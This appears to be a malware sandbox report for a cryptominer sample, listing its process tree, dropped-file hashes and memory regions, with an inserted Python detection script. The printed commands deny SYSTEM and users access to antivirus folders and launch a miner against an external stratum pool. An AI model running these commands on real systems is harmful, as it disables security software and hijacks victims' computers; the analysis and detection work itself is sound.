                                                                                                          • Modifies file permissions
                                                                                                          PID:1896
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                          PID:592
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                            5⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:3444
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:224
                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                              icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                              5⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:2508
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                              PID:4992
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                5⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:2412
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:2864
                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                  icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                  5⤵
                                                                                                                  • Modifies file permissions
                                                                                                                  PID:1172
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                4⤵
                                                                                                                  PID:4000
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                    5⤵
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:4064
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                    PID:4560
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                      5⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:1652
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                      PID:2568
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                        5⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:3064
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                        PID:4024
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                          5⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:4368
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                        4⤵
                                                                                                                          PID:380
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                            5⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:876
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                          4⤵
                                                                                                                            PID:3116
                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                              icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                              5⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:5080
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                            4⤵
                                                                                                                              PID:3416
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                5⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:1372
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                              4⤵
                                                                                                                                PID:3428
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                  5⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:2956
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
              4⤵
              PID:4760
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:1204
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
              4⤵
              PID:1888
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:1640
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
              4⤵
              PID:4104
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:364
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
              4⤵
              PID:4580
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:1968
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
              4⤵
              PID:5028
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:1864
            • C:\ProgramData\RealtekHD\taskhostw.exe
              C:\ProgramData\RealtekHD\taskhostw.exe
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of SetWindowsHookEx
              PID:1224
• C:\Programdata\RealtekHD\taskhost.exe
  C:\Programdata\RealtekHD\taskhost.exe
  1⤵
  • Modifies visibility of hidden/system files in Explorer
  • Executes dropped EXE
  • Drops file in System32 directory
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious behavior: GetForegroundWindowSpam
  PID:3552
    • C:\Programdata\WindowsTask\winlogon.exe
      C:\Programdata\WindowsTask\winlogon.exe
      2⤵
      • Executes dropped EXE
      PID:1984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /query /fo list
          3⤵
          PID:4136
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /query /fo list
              4⤵
              PID:3852
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig /flushdns
      2⤵
      PID:4104
        • C:\Windows\system32\ipconfig.exe
          ipconfig /flushdns
          3⤵
          • Gathers network information
          PID:4660
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c gpupdate /force
      2⤵
      PID:952
        • C:\Windows\system32\gpupdate.exe
          gpupdate /force
          3⤵
          PID:1888
    • C:\ProgramData\WindowsTask\MicrosoftHost.exe
      C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
• C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  1⤵
  • Executes dropped EXE
  PID:2948
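The tree above shows three behaviours a detection engineer would turn into rules: icacls /deny ACEs planted on the ESET and Panda Security directories for both SYSTEM and the interactive user (locking the AV out of its own files), payloads named taskhost.exe, taskhostw.exe and winlogon.exe executing from C:\ProgramData, and an XMRig-style command line pointing at stratum+tcp://185.139.69.167:3333. The Python below is an added example, not part of the sandbox report or of the sample, that evaluates those three rules over process-creation events shaped like Sysmon Event ID 1 (Image, CommandLine, ProcessId). The events are constructed from the tree plus three benign controls (PIDs 9001-9003) that must not fire; the protected-directory roots and the list of Windows binary names are assumptions to tune for your own estate.

```python
"""Detections for the behaviour in the process tree above, evaluated over
process-creation events shaped like Sysmon Event ID 1 (Image, CommandLine,
ProcessId). Added example; the sample events are constructed from the tree."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass

# Trees a legitimate administrator almost never locks SYSTEM or the interactive
# user out of; the ESET and Panda Security directories in the report sit here.
PROTECTED_ROOTS = (r"c:\program files", r"c:\program files (x86)", r"c:\programdata")
# Assumed, extensible list of Windows binary names worth checking for masquerading.
SYSTEM_BINARY_NAMES = {"taskhost.exe", "taskhostw.exe", "winlogon.exe",
                       "svchost.exe", "csrss.exe", "lsass.exe", "services.exe"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # split on whitespace, keep quoted paths whole
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([\w.\-]+):(\d+)", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    pid: int
    image: str
    detail: str


def tokenize(cmdline: str) -> list[str]:
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def _under(path: str, roots: tuple[str, ...]) -> bool:
    p = path.lower().rstrip("\\")
    return any(p == r or p.startswith(r + "\\") for r in roots)


def check_icacls_deny(ev: dict) -> Finding | None:
    """icacls <protected dir> /deny <principal>:(...) - the AV lockout in the tree."""
    toks = tokenize(ev["CommandLine"])
    low = [t.lower() for t in toks]
    if not any(ntpath.basename(t) in ("icacls", "icacls.exe") for t in low):
        return None
    if "/deny" not in low:
        return None
    i = low.index("/deny")
    if i == 0 or i + 1 >= len(toks) or not _under(toks[i - 1], PROTECTED_ROOTS):
        return None
    principal, _, perms = toks[i + 1].partition(":")
    severity = "high" if principal.lower() in ("system", "administrators", "everyone") else "medium"
    return Finding("icacls-deny-protected-dir", severity, ev["ProcessId"], ev["Image"],
                   f"deny {principal} {perms} on {toks[i - 1]}")


def check_miner(ev: dict) -> Finding | None:
    """XMRig-style command line: -o stratum+tcp://pool:port ..."""
    m = STRATUM_RE.search(ev["CommandLine"])
    if not m:
        return None
    return Finding("miner-stratum-pool", "high", ev["ProcessId"], ev["Image"],
                   f"pool {m.group(1)}:{m.group(2)}")


def check_masquerade(ev: dict) -> Finding | None:
    """A Windows binary name executing from outside C:\\Windows (here C:\\ProgramData)."""
    image = ev["Image"]
    name, parent = ntpath.basename(image).lower(), ntpath.dirname(image)
    if name not in SYSTEM_BINARY_NAMES or _under(parent, (r"c:\windows",)):
        return None
    return Finding("system-name-masquerade", "high", ev["ProcessId"], image,
                   f"{name} running from {parent}")


RULES = (check_icacls_deny, check_miner, check_masquerade)


def scan(events: list[dict]) -> list[Finding]:
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


def make_event(pid: int, image: str, cmd: str) -> dict:
    return {"ProcessId": pid, "Image": image, "CommandLine": cmd}


# Constructed from the tree above, plus three benign controls (pids 9001-9003).
SAMPLE_EVENTS = [
    make_event(4760, r"C:\Windows\SysWOW64\cmd.exe",
               r'C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)'),
    make_event(1204, r"C:\Windows\SysWOW64\icacls.exe", r'icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)'),
    make_event(1640, r"C:\Windows\SysWOW64\icacls.exe", r'icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)'),
    make_event(1864, r"C:\Windows\SysWOW64\icacls.exe",
               r'icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)'),
    make_event(1224, r"C:\ProgramData\RealtekHD\taskhostw.exe", r"C:\ProgramData\RealtekHD\taskhostw.exe"),
    make_event(1984, r"C:\Programdata\WindowsTask\winlogon.exe", r"C:\Programdata\WindowsTask\winlogon.exe"),
    make_event(3852, r"C:\Windows\SysWOW64\schtasks.exe", "schtasks /query /fo list"),
    make_event(2688, r"C:\ProgramData\WindowsTask\MicrosoftHost.exe",
               r"C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4"),
    make_event(9001, r"C:\Windows\System32\taskhostw.exe", r"C:\Windows\System32\taskhostw.exe"),
    make_event(9002, r"C:\Windows\System32\icacls.exe", r'icacls "C:\Users\Admin\Documents" /grant Admin:(OI)(CI)(M)'),
    make_event(9003, r"C:\Windows\System32\icacls.exe", r'icacls "C:\Users\Admin\Secret" /deny Everyone:(OI)(CI)(F)'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.rule:26} pid={f.pid:<5} {f.detail}")
```

Two points the sample makes visible: the cmd.exe wrapper carries %username% unexpanded while the child icacls shows the resolved Admin, so a rule keyed on the literal account name would miss the parent, which is why the check keys on /deny plus the target directory instead; and the deny on C:\Users\Admin\Secret (PID 9003) is left alone, because a user restricting their own folder is not the pattern of interest.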

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\ProgramData\RealtekHD\taskhost.exe
  Filesize  1.7MB
  MD5       de88d7ec667dea756d236e9053d7eeb9
  SHA1      ac6b619acece942f27d75e1e0ea46b94bc9b91a9
  SHA256    7ce418c4a92d459b2a1971bd32ac4dfea3711393b1dce49d0c92d7124d71e157
  SHA512    5c655def3bb5ab9c0255802e0c40667f16ef48f1042ff1c57e13199b38f0059cbff33517d6e940c39ca7d16d346830a92800e89058ae58ee02826472b0935942

• C:\ProgramData\RealtekHD\taskhostw.exe
  Filesize  2.9MB
  MD5       53f8233b58b8e3ba3e92d82cca29f119
  SHA1      ea7cae955f884aab7d048b6297fc0e472bb94a76
  SHA256    a114d6bccc183021671bbb15426cf227ec487f2379094ed6f19e4211efd3ce65
  SHA512    d1d4f385be4c8b8bdd16c8a8cc1fb75b6cee094ce69633724a4f53255dc560983097d26dc3b4d3e44a0eb718ac8ddb8d37c3b80f2c8747810f9c873ced558b23

• C:\ProgramData\Setup\update.exe
  Filesize  7.8MB
  MD5       36aadfa2332dc7e5077455ae5cb423ef
  SHA1      47cdc34d12f4820a005bba735caed72296d2400a
  SHA256    2240022c8262345cf4f7280141f53fc6fcc29b5436cf72a03581906665b9dda9
  SHA512    4dfaae0949f7c362221d14d3d080e8eaa5d7a2e43892aec653f1045c2044a0d24390704774748ab7d1252ba8f3dea5008970f1e0d879ce3b3dc190002db2f56c

• C:\ProgramData\WindowsTask\MicrosoftHost.exe
  Filesize  2.0MB
  MD5       a74ad3584394b0766ada52191b245013
  SHA1      6b25f4ba2c86541d4e2e5872a63fa1005373966b
  SHA256    1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
  SHA512    5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

• C:\ProgramData\WindowsTask\WinRing0x64.sys
  Filesize  14KB
  MD5       0c0195c48b6b8582fa6f6373032118da
  SHA1      d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

• C:\Users\Admin\AppData\Local\Temp\aut5A9E.tmp
  Filesize  381KB
  MD5       ec0f9398d8017767f86a4d0e74225506
  SHA1      720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
  SHA256    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
  SHA512    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

• C:\Users\Admin\AppData\Local\Temp\aut6A92.tmp
  Filesize  5.5MB
  MD5       ebe2c898363c9e42908504bf053ad018
  SHA1      9b02d448e534d6078f117db09c7ceca3c63e8ea5
  SHA256    f034d58596cbb1023b31c891bce2b14207700fa27fd1d5836b177327c9755175
  SHA512    c8d23c03869541cf6f2d108ab00b790286f95b23d729a7d44a3b0cf75ba497831b0c1cbc6860e0d51e2d49edb03a2a9c3ee0272a7cc679ffd4f963df03010b86

• C:\Windows\System32\drivers\etc\hosts
  Filesize  4KB
  MD5       e335b19dd00855d6d352f8c0512bab33
  SHA1      335f886a166b852beeb1dfec3d27eeced4a11547
  SHA256    8f16e9d38dd11092dd0ef01e91c551aa15d161396e84c9b534de8d646118028d
  SHA512    ef8cda0161d1be8a84942e20689163a880e3d95f7914a6c80f9b2714ca26fe5cbb677a2341ad5bda203e0cbad71b3df9a068e2accfc2164d132adfbdbb9adbcd

• C:\Windows\System32\drivers\etc\hosts
  Filesize  1KB
  MD5       9901c0bbfe99666fac8ca6b3abbc6800
  SHA1      7f17ae9ee3fe111213cb391cb380b51b8d298f9c
  SHA256    1517e364d470f3bd25be8c0ca8714b4cf5ca70995f4d932041a001da8dde2622
  SHA512    a3aaf2a55e35632575f5b6337def0135557a8b42141824dfc0a77484a58eed03b8004249bc2028e81f3e4c5cedae2853bc24d46a1418253c0969484c57f5915e

• C:\programdata\microsoft\temp\H.bat
  Filesize  5KB
  MD5       ec45b066a80416bdb06b264b7efed90d
  SHA1      6679ed15133f13573c1448b5b16a4d83485e8cc9
  SHA256

                                                                                                                                              cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e

                                                                                                                                              SHA512

                                                                                                                                              0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

                                                                                                                                            • memory/1984-533-0x00000000004F0000-0x00000000005DC000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              944KB

                                                                                                                                            • memory/1984-539-0x00000000004F0000-0x00000000005DC000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              944KB

                                                                                                                                            • memory/2688-555-0x000002200C2B0000-0x000002200C2C0000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              64KB